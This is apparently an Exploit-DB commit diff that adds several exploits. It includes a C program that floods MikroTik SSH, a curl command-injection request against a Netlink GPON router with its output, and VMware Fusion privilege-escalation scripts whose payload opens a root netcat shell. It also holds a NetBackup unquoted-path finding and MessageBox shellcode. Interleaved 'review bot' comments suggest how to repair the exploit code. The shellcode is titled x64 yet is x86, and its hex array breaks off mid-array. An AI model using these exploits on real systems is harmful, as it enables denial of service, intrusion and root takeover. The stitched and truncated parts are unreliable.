DB: 2020-03-19

7 changes to exploits/shellcodes

NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path
Microsoft VSCode Python Extension - Code Execution
VMWare Fusion - Local Privilege Escalation

Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)

Netlink GPON Router 1.0.11 - Remote Code Execution

Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
Offensive Security 2020-03-19 05:01:49 +00:00
parent 20e5ee2e94
commit 85cdf30cea
9 changed files with 560 additions and 1 deletions


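--- a/exploits/hardware/remote/48228.txt
+++ b/exploits/hardware/remote/48228.txt
@@ -0,0 +1,103 @@
+# Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)
+# Author: Hosein Askari
+# Date: 2020-03-18
+# Vendor Homepage: https://mikrotik.com/
+# Model: hAP lite
+# Processor architecture: smips
+# Affected Version: through 6.44.3
+# CVE: N/A
+#Description:
+An uncontrolled resource consumption vulnerability in SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections with SIGPIPE signal(SIGPIPE is the "broken pipe" signal, which is sent to a process when it attempts to write to a pipe whose read end has closed or when it attempts to write to a socket that is no longer open for reading. The default action is to terminate the process) and cause a reboot via connect and write system calls because of uncontrolled resource management.
+#details:
+The issue reported in 02/25/2020 to the Mikrotik
+First response by Mikrotik in 02/26/2020
+The additional information about exploit and PoC video sent in 02/26/2020
+The vulnerability is accepted by "Reinis-Jānis S" from mikrotik security team in 02/27/2020 and asked for providing the CVE number and disclosure date
+#PoC:
+#Mitigation:
+It can be mitigated with firewall filter and service port restrictions.
+Solution:
+Hardening and tuning the daemon for these 2 parameters:
+1- Number of allowed unauthenticated connections to ssh daemon
+2- Maximum number of connections at which we start dropping everything for ssh daemon
+PoC:
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <netdb.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#define MAX_CON 32
+#define MAX_THREADS 16
+int Socket(char *ip, char *port) {
+struct addrinfo hints, *ret, *p;
+int sock, r;
+ssize_t bytes;
+char buffer[2048];
+memset(&hints, 0, sizeof(hints));
+hints.ai_family = AF_UNSPEC;
+hints.ai_socktype = SOCK_STREAM;
+if((r=getaddrinfo(ip, port, &hints, &ret))!=0) {
+return EXIT_FAILURE;
+}
+for(p = ret; p != NULL; p = p->ai_next) {
+if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
+continue;
+}
+if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
+close(sock);
+continue;
+}
+break;
+}
+if(ret)
+freeaddrinfo(ret);
+fprintf(stderr, "ESTABLISHED %s:%s\n", ip, port);
+return sock;
+}
+void signal_callback_handler(int signum){
+printf("Caught signal SIGPIPE %d\n",signum);
+}
+void mal(char *ip, char *port, int id) {
+int sockets[MAX_CON];
+int i, g=1, r;
+for(i=0; i!= MAX_CON; i++)
+sockets[i]=0;
+signal(SIGPIPE, signal_callback_handler);
+while(1) {
+for(i=0; i!= MAX_CON; i++) {
+if(sockets[i] == 0)
+sockets[i] = Socket(ip, port);
+r=write(sockets[i], "\0", 1);
+if(r == -1) {
+close(sockets[i]);
+sockets[i] = Socket(ip, port);
+}
+}
+usleep(200000);
+}
+}
+int main(int argc, char **argv) {
+int i;
+for(i=0; i!= MAX_THREADS; i++) {
+if(fork())
+mal(argv[1], argv[2], i);
+usleep(200000);
+}
+getc(stdin);
+return 0;
+}
+#########
+Sincerely,
+Hosein Askari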
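Review bot: `Socket()` returns `EXIT_FAILURE` (1) when getaddrinfo fails and, when every connect attempt fails, still prints `ESTABLISHED` and returns whatever `sock` last held, so `mal()` ends up calling `write()` on stdout or on an already-closed descriptor and the error branch after it is reasoning about the wrong object; return -1 on both paths, e.g. `if (r != 0) return -1;` and `return p ? sock : -1;`, and move the `ESTABLISHED` message under a successful connect. `main` reads `argv[1]` and `argv[2]` without checking `argc`, and `buffer`, `bytes` and `g` are declared but never used. On the documentation side the header field is spelled `# Excploit Title:`, and the `#PoC:` heading under the details is empty, which reads as if the proof of concept were omitted even though it follows under `PoC:`.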


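--- a/exploits/hardware/webapps/48225.txt
+++ b/exploits/hardware/webapps/48225.txt
@@ -0,0 +1,66 @@
+# Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution
+# Date: 2020-03-17
+# Exploit Author: shellord
+# Vendor Homepage: https://www.netlink-india.com/
+# Version: 1.0.11
+# Tested on: Windows 10
+# CVE: N/A
+Exploit :
+curl -L -d "target_addr=;ls /&waninf=1_INTERNET_R_VID_154"
+http://TARGETIP/boaform/admin/formPing
+Response :
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+<!--ϵͳĬģ-->
+<html>
+<head>
+<title>PINGԽ</title>
+<meta http-equiv=pragma content=no-cache>
+<meta http-equiv=refresh content="2">
+<meta http-equiv=cache-control content="no-cache, must-revalidate">
+<meta http-equiv=content-type content="text/html; charset=gbk">
+<meta http-equiv=content-script-type content=text/javascript>
+<!--ϵͳcss-->
+<style type=text/css>
+@import url(/style/default.css);
+</style>
+<!--ϵͳű-->
+<script language="javascript" src="common.js"></script>
+</head>
+<!-------------------------------------------------------------------------------------->
+<!--ҳ-->
+<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"
+alink="#000000" link="#000000" vlink="#000000">
+<blockquote>
+<form>
+<div align="left" style="padding-left:20px;"><br>
+<div align="left"><b>Finish</b>
+<br><br>
+</div>
+<pre>
+bin
+dev
+etc
+home
+image
+lib
+mnt
+proc
+sbin
+sys
+tmp
+usr
+var
+</pre>
+<input type=button value="back"
+onClick=window.location.replace("/diag_ping_admin_en.asp")>
+</div>
+</form>
+</blockquote>
+</body>
+</html>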
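Review bot: The advisory carries no mitigation or vendor-contact information, and `# Tested on: Windows 10` describes the host the curl command was issued from rather than the affected device firmware, which is how that field is used by the other entries in this commit. Add a line such as `# Mitigation: keep the management interface under /boaform/admin/ off the WAN side and restricted to trusted hosts until fixed firmware is available`, and note whether the vendor was notified and when. The captured response is declared `charset=gbk`, so its comment lines render as mojibake here; keeping only the `<pre>` block of the response would preserve the evidence of command output without the garbled markup.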


@ -6,7 +6,7 @@
# Software Link: http://centos-webpanel.com/ # Software Link: http://centos-webpanel.com/
# Version: v6 - v7 # Version: v6 - v7
# Tested on: Kali Linux - Windows 10 # Tested on: Kali Linux - Windows 10
# CVE : N/A # CVE : CVE-2020-10230
# Type: Error Based SQL Injection # Type: Error Based SQL Injection
# Payload: # Payload:


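--- a/exploits/macos/local/48232.md
+++ b/exploits/macos/local/48232.md
@@ -0,0 +1,148 @@
+Local Privilege Escalation via VMWare Fusion
+Overview:
+A directory traversal vulnerability in VMware Fusion's SUID binaries can allow
+an attacker to run commands as the root user.
+Tested Versions:
+* VMware Fusion 10.1.3 (9472307) on macOS 10.13.6
+* VMware Fusion 11.0.0 (10120384) on macOS 10.14.1
+* VMware Fusion 11.0.2 (10952296) on macOS 10.14.1
+* VMware Fusion 11.5.0 (14634996) on macOS 10.15.1
+* VMware Fusion 11.5.1 (15018442) on macOS 10.15.1
+Exercising:
+1) Ensure the VMware Fusion services are not running. If open, quit the VMware
+Fusion GUI.
+2) Run one of the exploit script (exploit_fusion.sh or exploit_usb.sh). They
+will remain running until manually stopped via CTRL-c. The exploit will start
+a netcat listener as root on TCP port 3333.
+3) Connect to the netcat listener: nc 127.0.0.1 3333
+Details:
+This vulnerability is a directory traversal bug inside of VMware Fusion. Several
+of the programs included in VMware Fusion rely on the their path on disk to find
+other libraries, helper utilities, and service daemons. Two such instances of
+this code pattern in SUID programs can be found in the "Open VMware Fusion
+Services" executable and the "Open VMware USB Arbitrator Service" executable.
+These programs try to open the service programs by looking for the files:
+Open VMware Fusion Services:
+$DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware Fusion Services
+Open VMware USB Arbitrator Service:
+$DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware USB Arbitrator Service
+While ordinarily this is fine, as any attempt to copy the programs will not copy
+the SUID ownership of the file and any attempt to the move the programs will
+fail without root access. Furthermore symbolic links will not trick the programs
+into using the new location. However, on macOS unprivileged users can create
+hard links to SUID executables, which will trick the programs. Thus, by creating
+an adequate directory layout and hard linking to the SUID programs, we can trick
+them into running an executable of our choice as the root user. The included
+exploit_usb.sh and exploit_fusion.sh scripts setup the correct directory
+structure and hard link, compile the payload, and run the linked program in
+order to start a netcat listener as root on TCP port 3333.
+In addition to the two SUID executables listed above, the SUID executable
+"vmware-authd" is also vulnerable to this bug. vmware-authd tries to load two
+libraries, libcrypto and libssl, from the incorrect directory. However, the two
+libraries must be signed by apple or with an apple distributed signing
+certificate from an organization containing the word "VMware". As such, this bug
+is harder to exploit in vmware-authd. Depending on how strict Apple's developer
+verification process is, it may be possible to fool Apple into granting a
+matching certificate by hiding VMware within a phrase, such as with a
+certificate for "Never Mind Where cloud services inc (NVMware Inc)".
+One limitation to this vulnerability is that these two vulnerable service
+openers will not try to open their services if the service is already running.
+Thus, the exploit will not work if the "VMware USB Arbitrator Service" and
+"VMware Fusion Services" services are already running. Thus, if the VMware
+Fusion GUI is open, this vulnerability cannot be exploited. However, closing the
+GUI will stop the services associated with the vulnerable service openers and
+make the vulnerability once again exploitable. In contrast, the library
+injection attack is not subject to these restrictions (but requires the
+appropriate certificate).
+As a side note, the vulnerable code is also used in VMware Workstation on Linux.
+However, Linux does not allow an unprivileged user to create hard links to files
+they do not own. As such, this bug is not exploitable in VMware Workstation on
+Linux.
+Timeline:
+2019.11.12 Reported to VMware
+2019.12.18 VMware confirms they can reproduce the issue
+2019.12.24 Asked for status update, were told we'd get an update in early Jan
+2020.01.08 Requested status update, were told fix scheduled for April 2020
+2020.01.15 Called VMware to discuss
+2020.01.21 Follow up meeting with VMware to discuss
+2020.03.17 VMware releases patch & public disclosure
+## exploit_fusion.sh
+```
+#!/bin/sh
+# Remake the necessary folder structure
+rm -rf a Contents
+mkdir -p Contents/Library/services/
+mkdir -p a/b/c/
+# Build our payload
+clang payload.c -o "Contents/Library/services/VMware Fusion Services"
+# Create a hard link to the VMware SUID opener program
+ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services a/b/c/linked
+# Run the linked program, which causes it to be confused about the path, and
+# launch our payload. Additionally if our payload exits, VMware will relaunch
+# it
+a/b/c/linked
+```
+## exploit_fusion.sh EOF
+## exploit_usb.sh
+```
+#!/bin/sh
+# Remake the necessary folder structure
+rm -rf a Contents
+mkdir -p Contents/Library/services/
+mkdir -p a/b/c/
+# Build our payload
+clang payload.c -o "Contents/Library/services/VMware USB Arbitrator Service"
+# Create a hard link to the VMware SUID opener program
+ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ USB\ Arbitrator\ Service a/b/c/linked
+# Run the linked program, which causes it to be confused about the path, and
+# launch our payload. Additionally if our payload exits, VMware will relaunch
+# it
+a/b/c/linked
+```
+## exploit_usb.sh EOF
+## payload.c
+```
+#include <stdlib.h>
+#include <unistd.h>
+int main(int argc, char**argv) {
+setuid(0);
+system("rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 3333 > /tmp/f");
+return 0;
+}
+```
+## payload.c EOF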
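Review bot: `payload.c` starts `nc -l 3333` without a bind address, so while the PoC is running the root shell is reachable from every interface of the test machine, although step 3 of "Exercising" only describes connecting from 127.0.0.1. Either bind the listener to loopback (`nc -l 127.0.0.1 3333` with the BSD nc shipped on macOS) or state in step 2 that the listener is network-reachable for as long as the scripts run. Both scripts begin with `rm -rf a Contents` in the current directory; a comment above it saying that it deletes any existing `a` or `Contents` entries in the working directory would save a reader who runs the script from the wrong place. `payload.c` also ignores the return of `setuid(0)`, so if the escalation did not happen the `system()` line still runs under the caller's uid and a failed attempt looks like a successful one; `if (setuid(0) != 0) return 1;` would make that visible.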


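--- a/exploits/multiple/local/48231.md
+++ b/exploits/multiple/local/48231.md
@@ -0,0 +1,16 @@
+# VSCode Python Extension Code Execution
+This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the [Visual Studio Code](https://code.visualstudio.com/) Python extension.
+>TL;DR: VScode may use code from a virtualenv found in the project folders without asking the user, for things such as formatting, autocompletion, etc. This insecure design leads to arbitrary code execution by simply cloning and opening a malicious Python repository.
+You can read more about this vulnerability on our blog: [https://blog.doyensec.com/2020/03/16/vscode_codeexec.html](https://blog.doyensec.com/2020/03/16/vscode_codeexec.html).
+## HowTo
+- Clone the 'malicious' repository with `git clone https://github.com/doyensec/VSCode_PoC_Oct2019.git`
+- Add the cloned repo to a VSCode workspace on macOS. Note that the vulnerability affects all platforms, but the PoC is executing *Calculator.app*
+- Open `test.py` in VScode
+Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48231.zip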
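Review bot: The entry never says which versions of the Python extension were tested or whether a fixed release exists, while every other advisory in this commit carries a version or tested-version field; without it the index row cannot be used to decide whether an installation is exposed. Add a line under the title such as `# Affected: <extension versions tested> — Fixed in: <version or "none at time of writing">`, taking the values from the linked blog post if it gives them. It would also help to state in the HowTo that the PoC only triggers once the extension picks up the virtualenv in the cloned folder, since that is the behaviour the TL;DR describes but the steps do not mention.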


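--- a/exploits/windows/local/48227.txt
+++ b/exploits/windows/local/48227.txt
@@ -0,0 +1,35 @@
+# Exploit Title: NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path
+# Discovery by: Alan Mondragon "El Masas"
+# Discovery Date: 2020-03-17
+# Vendor Homepage: https://www.veritas.com/
+# Software Link : https://www.veritas.com/
+# Veritas
+# Tested Version: 7.0
+# Vulnerability Type: Unquoted t Service Path
+# Tested on OS: Windows Server 2008 R2 en
+# Step to discover Unquoted Service Path:
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Auto
+NetBackup Client Service NetBackup INET Daemon
+C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe
+Auto
+C:\>sc qc "NetBackup INET Daemon"
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: NetBackup INET Daemon
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : NetBackup Client Service
+DEPENDENCIES :
+SERVICE_START_NAME : LocalSystem
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path
+# undetected by the OS or other security applications where it could potentially be executed during
+# application startup or reboot. If successful, the local user's code would execute with the elevated
+# privileges of the application.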
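Review bot: The `#Exploit:` section does not state that the unquoted `C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe` path only becomes code execution if a local user can create files in `C:\` or `C:\Program Files\`, which standard users cannot on a default Windows install, so the finding is conditional on loosened ACLs and the text should say so. A mitigation line is also missing; something like `# Mitigation: quote the service's ImagePath (sc config "NetBackup INET Daemon" binPath= "\"C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe\"") and audit write ACLs on C:\ and C:\Program Files` gives an administrator an immediate fix. The `# Vulnerability Type: Unquoted t Service Path` field has a stray `t`, and `# Software Link` duplicates the vendor homepage rather than pointing at the product download.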


@ -10991,6 +10991,9 @@ id,file,description,date,author,type,platform,port
48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows, 48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows,
48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows, 48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows,
48211,exploits/windows/local/48211.py,"AnyBurn 4.8 - Buffer Overflow (SEH)",2020-03-13,"Richard Davy",local,windows, 48211,exploits/windows/local/48211.py,"AnyBurn 4.8 - Buffer Overflow (SEH)",2020-03-13,"Richard Davy",local,windows,
48227,exploits/windows/local/48227.txt,"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path",2020-03-18,"El Masas",local,windows,
48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,
48232,exploits/macos/local/48232.md,"VMWare Fusion - Local Privilege Escalation",2020-03-17,Grimm,local,macos,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -18046,6 +18049,7 @@ id,file,description,date,author,type,platform,port
48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware, 48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware,
48223,exploits/linux/remote/48223.rb,"Rconfig 3.x - Chained Remote Code Execution (Metasploit)",2020-03-17,Metasploit,remote,linux, 48223,exploits/linux/remote/48223.rb,"Rconfig 3.x - Chained Remote Code Execution (Metasploit)",2020-03-17,Metasploit,remote,linux,
48224,exploits/multiple/remote/48224.rb,"ManageEngine Desktop Central - Java Deserialization (Metasploit)",2020-03-17,Metasploit,remote,multiple, 48224,exploits/multiple/remote/48224.rb,"ManageEngine Desktop Central - Java Deserialization (Metasploit)",2020-03-17,Metasploit,remote,multiple,
48228,exploits/hardware/remote/48228.txt,"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)",2020-03-18,FarazPajohan,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42478,3 +42482,4 @@ id,file,description,date,author,type,platform,port
48219,exploits/php/webapps/48219.py,"PHPKB Multi-Language 9 - Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php, 48219,exploits/php/webapps/48219.py,"PHPKB Multi-Language 9 - Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php, 48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php,
48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php, 48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware,



@ -1016,3 +1016,4 @@ id,file,description,date,author,type,platform
47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows 47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows
48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux 48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux
48116,shellcodes/windows_x86/48116.c,"Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86 48116,shellcodes/windows_x86/48116.c,"Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
48229,shellcodes/windows/48229.txt,"Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows

1 id file description date author type platform
1016 47980 shellcodes/windows/47980.txt Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes) 2020-01-30 boku shellcode windows
1017 48032 shellcodes/linux/48032.py Linux/x86 - Bind Shell Generator Shellcode (114 bytes) 2020-02-10 boku shellcode linux
1018 48116 shellcodes/windows_x86/48116.c Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes) 2020-02-24 boku shellcode windows_x86
1019 48229 shellcodes/windows/48229.txt Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) 2020-03-18 boku shellcode windows


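--- a/shellcodes/windows/48229.txt
+++ b/shellcodes/windows/48229.txt
@@ -0,0 +1,185 @@
+# Shellcode Title: Windows\x64 Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
+# Shellcode Author: Bobby Cooke
+# Date: March 2020-03-17
+# Tested On:
+# Windows 10 Pro 1909 (x86): HelpPane.exe, notepad.exe, certutil.exe
+# Windows 10 Pro 1909 (x86_64): mmc.exe, xwizard.exe
+# [!] Will only work if MessageBoxA or MessageBoxW exist in the Import Table of the Host PE
+; Create new StackFrame
+push ebp
+mov ebp, esp
+sub esp, 0x10
+; Dynamically find the base address of the executable image from the PEB
+; FS_Register > TEB > PEB > &ImageBase
+xor ecx, ecx
+mul ecx ; Clears EAX, ECX, EDX Registers
+mov ebx, eax ; clear EBX Register
+mov ebx, [fs:ebx+0x30] ; get PEB address = TEB+0x30
+mov ebx, [ebx+0x8] ; get Image Base Addr = PEB+0x8
+push ebx ; save &ImageBase in EBX
+pop eax ; copy &ImageBase to EAX
+; Get the Address of the Import Table
+; DOS_Header > PE_Signature > ImportTable
+add eax, [ebx+0x3C] ; EAX = &PE_Signature
+mov dl, 0x80 ; &PE_Signature+0x80 = &ImportTable_RVA
+add ax, dx ; EAX = &ImportTable_RVA
+mov edx, [eax] ; EDX = RVA ImportTable
+add edx, ebx ; EDX = &ImportTable
+add dl, 0xC ; EDX = &Name_RVA of first Imported DLL
+; Create string 'USER32'
+mov cx, 0x3233 ; 23 : 3233
+push ecx ; push "23, 0x0000"
+push 0x52455355 ; RESU : 52455355
+mov [ebp-0x4], esp
+; Find the Name RVA for user32.dll within the Import Table
+; ImportTable > ImportDirectoryTable > LoopNameRVA's
+xor ecx, ecx ; ECX = Counter
+fUser32Name:
+push edx ; EDX = &Name_RVA of first Imported DLL
+xor eax, eax
+mov al, 0x14 ; &Name_RVA's are every 20 bytes
+mul cl ; Counter * 20 bytes
+add [esp], eax
+pop eax ; EAX = &Name_RVA of Nth DLL
+push eax
+mov esi, [ebp-0x4] ; ESI = &String
+mov edi, [eax] ; EDI = RVA Name of Nth DLL
+add edi, ebx ; EDI = &Name of Nth DLL
+push ecx ; save counter to stack
+xor ecx, ecx
+cld ; clear direction flag = Process strings from left to right
+mov cl, 0x6 ; ECX = String Length
+repe cmpsb ; compare first 6 bytes of &
+pop ecx ; ECX = Counter
+jz foundUser32Name ; If string at &Name_RVA == "USER32", then end loop
+pop eax ; Pickup String Addr to fix stack
+inc ecx ; else Counter ++
+jmp short fUser32Name ; restart the loop
+foundUser32Name:
+pop eax ; EAX = &Name_RVA of user32.dll
+mov [ebp-0x8], eax ; [ESP-0x8] = &Name_RVA of user32.dll
+sub al, 0xC ; EAX = &User32_ImportNameTable_RVA
+mov eax, [eax] ; EAX = User32_ImportNameTable_RVA
+add eax, ebx ; EAX = &User32_ImportNameTable
+mov [ebp-0xC], eax ; [ESP-0xC] = &User32_ImportNameTable
+; Create string 'MessageBoxA'
+mov ecx, 0x41786f6f ; Axoo : 41786f6f
+shr ecx, 8
+push ecx ; "oxA,0x00"
+push 0x42656761 ; Bega : 42656761
+push 0x7373654d ; sseM : 7373654d
+jmp Counter
+MessageBoxW:
+mov byte [esp+0xA], 0x57 ; Change A to W
+mov eax, [ebp-0xC] ; EAX = &User32_ImportNameTable
+; Find the Name RVA for MessageBoxA within the Import Table
+; ImportTable > ImportDirectoryTable > LoopNameRVA's
+Counter:
+xor ecx, ecx
+fNameLoop:
+mov esi, esp ; ESI = "MessageBoxA,0x00"
+xor edx, edx
+mov edi, [eax] ; EDI = RVA NameString
+cmp edi, edx ; See if we checked all imported function names
+je MessageBoxW
+add edi, ebx ; EDI = &NameString of Nth Function
+inc edi ; skip the first 2 bytes - Ordinal Value
+inc edi ; skip the first 2 bytes
+push ecx ; push counter value
+xor ecx, ecx
+cld ; clear direction flag = Process strings from left to right
+mov cl, 0xB ; ECX = String Length
+repe cmpsb ; compare first 11 bytes
+pop ecx ; ECX = Counter value
+jz foundName ; If string at &NameString == "MessageBox-", then end loop
+mov dl, 0x4
+add eax, edx ; Next RVA NameString of Imported User32.dll function
+inc ecx ; Counter ++
+jmp short fNameLoop ; restart the loop
+foundName:
+mov eax, [ebp-0x8] ; EAX = &User32_Name_RVA
+add al, 0x4 ; EAX = &User32_ImportAddressTable_RVA
+mov edi, [eax] ; EDI = User32_ImportAddressTable_RVA
+add edi, ebx ; EDI = &User32_ImportNameTable
+xor eax, eax
+mov al, 0x4
+mul cx ; Counter * 4 = Offset MessageBoxA in Table
+add eax, edi ;[EAX] = &MessageBoxA
+mov eax, [eax] ; EAX = &MessageBoxA
+mov byte bl, [esp+0xA] ; DL = 'A' or 'W'
+;CALL to MessageBoxA
+; hOwner = NULL
+; Text = "BOKU"
+; Title = "BOKU"
+; Style = MB_OK|MB_APPLMODAL
+xor ecx, ecx ; clear ecx register
+push ecx ; string terminator 0x00 for string "BOKU"
+; MessageBoxA or MessageBoxW?
+cmp bl, 0x41 ; if BL = 'A', then
+je MsgBoxA ; push ASCII string
+; String = "B-O-K-U-"
+push 0x2d552d4b ; -U-K : 2d552d4b
+push 0x2d4f2d42 ; -O-B : 2d4f2d42
+mov edx, esp ; EDX = &String
+UnicodeStrLoop:
+inc edx ; 1st Char +1
+mov byte [edx], ch ; Null byte after ever char in Unicode String
+inc edx ; Every Other Char +2
+inc ecx ; LoopCounter ++
+cmp cl, 0x4 ; If end of string, then
+je pushArgs ; Push arguments to stack for MessageBox- Call
+jmp short UnicodeStrLoop
+MsgBoxA:
+push 0x554b4f42 ; UKOB : 554b4f42
+pushArgs:
+xor ecx, ecx
+mov ebx, esp ; EBX = &String
+push ecx
+push ebx
+push ebx
+push ecx
+call eax ; Call MessageBox- Function
+############################################################################################################################
+#include <windows.h>
+#include <stdio.h>
+char code[] = \
+"\x55\x89\xe5\x83\xec\x10\x31\xc9\xf7\xe1\x89\xc3\x64\x8b\x5b\x30\x8b\x5b"
+"\x08\x53\x58\x03\x43\x3c\xb2\x80\x66\x01\xd0\x8b\x10\x01\xda\x80\xc2\x0c"
+"\x66\xb9\x33\x32\x51\x68\x55\x53\x45\x52\x89\x65\xfc\x31\xc9\x52\x31\xc0"
+"\xb0\x14\xf6\xe1\x01\x04\x24\x58\x50\x8b\x75\xfc\x8b\x38\x01\xdf\x51\x31"
+"\xc9\xfc\xb1\x06\xf3\xa6\x59\x74\x04\x58\x41\xeb\xde\x58\x89\x45\xf8\x2c"
+"\x0c\x8b\x00\x01\xd8\x89\x45\xf4\xb9\x6f\x6f\x78\x41\xc1\xe9\x08\x51\x68"
+"\x61\x67\x65\x42\x68\x4d\x65\x73\x73\xeb\x08\xc6\x44\x24\x0a\x57\x8b\x45"
+"\xf4\x31\xc9\x89\xe6\x31\xd2\x8b\x38\x39\xd7\x74\xec\x01\xdf\x47\x47\x51"
+"\x31\xc9\xfc\xb1\x0b\xf3\xa6\x59\x74\x07\xb2\x04\x01\xd0\x41\xeb\xe0\x8b"
+"\x45\xf8\x04\x04\x8b\x38\x01\xdf\x31\xc0\xb0\x04\x66\xf7\xe1\x01\xf8\x8b"
+"\x00\x8a\x5c\x24\x0a\x31\xc9\x51\x80\xfb\x41\x74\x18\x68\x4b\x2d\x55\x2d"
+"\x68\x42\x2d\x4f\x2d\x89\xe2\x42\x88\x2a\x42\x41\x80\xf9\x04\x74\x07\xeb"
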